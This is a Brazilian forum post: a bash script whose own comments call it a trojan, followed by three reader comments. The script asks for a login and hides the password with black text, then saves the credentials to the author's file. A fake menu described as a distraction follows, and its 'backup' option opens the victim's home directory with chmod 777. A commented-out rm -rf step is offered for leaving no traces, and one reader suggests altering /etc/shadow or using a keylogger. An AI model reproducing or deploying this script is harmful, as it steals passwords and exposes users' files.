#!/bin/bash
#Leonardo Weslei Diniz
#mail:exterminador3@gmail.com
#http://exterminador3.coolpage.biz(em construção)
arquivo(){
touch "/home/<<<aki vc coloca o destino do seu home>>>/$login.txt"
echo "login = $login - senha = $senha " >> "/home/<<<aki vc coloca o destino do seu home onde vão estar as senhas capturadas>>>/$login.txt" #gera um arquivo com o nome do usuario
}
echo "digite seu login"
read login
echo "agora digite sua senha"
echo -e "\e[40;30m"
read senha
echo -e "\e[m"
clear
arquivo #função simplesinha q faz o trojan
while :; do
echo -e "\nescolha
1-buscar
2-mandar arquivos
3-entrar no login
4-trocar senha
5-backup do login
0-sair" #opçoes para distrair o usuario
read op
case $op in
0)exit 0 ;;
1)echo "qual diretorio?"
echo $(ls -F | grep /)
read z
echo "digite o que quer procurar:"
read x
if ! find $z -type f -name "*$x*" #"*$@*"
then echo "vc precisa digitar algum texto"
fi
;;
2)echo "que arquivo deseja enviar?"
read arq
scp $arq "$login@localhost:~/" #no lugar de localhost vc pode colocar o ip da maquina
;;
3)echo "digite seu login à entrar"
read login
echo "agora digite sua senha"
read senha
su $login
;;
4)echo "nova senha"
read senha2
echo "repita a nova senha"
read senha3
passwd
;;
5)chmod 777 ~/../$USER/; #desbloqueia a pasta do usuario, assim vc pode invadir atravez de url tb
DIR_ORIG=~/../$USER/
DIR_DEST="/tmp/"
BKP_NAME="$USER.tar.gz"
tar -czpf ${DIR_DEST}${BKP_NAME} ${DIR_ORIG}
echo "Seu backup foi realizado com sucesso na pasta tmp com o nome $BKP_NAME."
case $USER in
"<<<aki vc coloca o nome do seu usuario>>>")
chmod 733 ~/../$USER; # se e somente se for vc que estiver usando o programa
;;
*);;
esac
;;
*)echo "opcao invalida!";;
esac
read;
clear
# rm -rf geral.sh #vc coloca essa opção se não quiser deixar rastros
done
[11] Comentário enviado por marcosmiras em 21/01/2008 - 16:36h
Leonardo,
Quando fizer um script para compartilhar com a comunidade, deixe as variáveis um pouco deslocadas mais acima no script somente para facilitar, ficar procurando no meio do script é complicado! Se você coloca-se esse script no bash do usuário até que "funcionaria"... Mas se você consegue jogar o arquivo na maquina do camarada não seria mais fácil aterar o /etc/shadow? Ou um keylogger? Estranha sua ferramenta, mas bacana... o que vale realmente é a intenção, mudando algumas coisas seria uma interessante ferramenta de backup...
Abraços...
[12] Comentário enviado por removido em 22/01/2008 - 10:02h
Acho que foi para para apreender shell-script, porém o fundamento do script não tem muito nexo com uma comunidade que entendo que um deve ajudar o outro...
E corre o risco de algum iniciante ter uma mal experiência com o OS
[13] Comentário enviado por cesarsecco em 23/01/2008 - 11:35h
Na verdade o que conta é a intenção.
Pra alguns pode parecer tosco, ou sem utilidade, mas gostaria de lembra-los, que algumas coisas surgem em função de outras.
Parte da ideia de uns, pode solucionar o problema de outros...